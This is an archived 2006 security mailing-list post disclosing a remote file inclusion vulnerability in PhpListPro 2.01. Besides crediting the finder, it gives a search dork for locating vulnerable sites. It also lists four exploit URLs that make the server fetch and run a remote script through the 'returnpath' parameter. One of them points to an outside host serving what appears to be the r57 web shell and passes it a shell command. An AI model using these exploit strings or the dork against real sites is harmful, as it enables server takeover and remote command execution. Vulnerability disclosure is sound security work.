|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
PhpListPro 2.01 Remote File Include Vulnerability
SnoBMSN
Hotmail.De
Date: Mon May 08 2006 - 15:40:10 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Credits:
Discovered by: SnoB ->> SnoBmsnhotmail.de
http://www.cyber-security.org
Vendor URL : SmartISoft http://smartisoft.com
Dork/Search for: "PHPListPro ©2001-2006 SmartISoft"
Exploit :
/config.php?returnpath=http://www.example.com/yourscript.txt?&ls%20-laF
/editsite.php?returnpath=http://www.example.com/yourscript.txt?&ls%20-laF
/in.php?returnpath=http://www.example.com/yourscript.txt?&ls%20-laF
/addsite.php?returnpath=http://mitglied.lycos.de/n0ssy/r57.txt?&cmd=ls
Security Adivisory | Edithor by SnoB
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]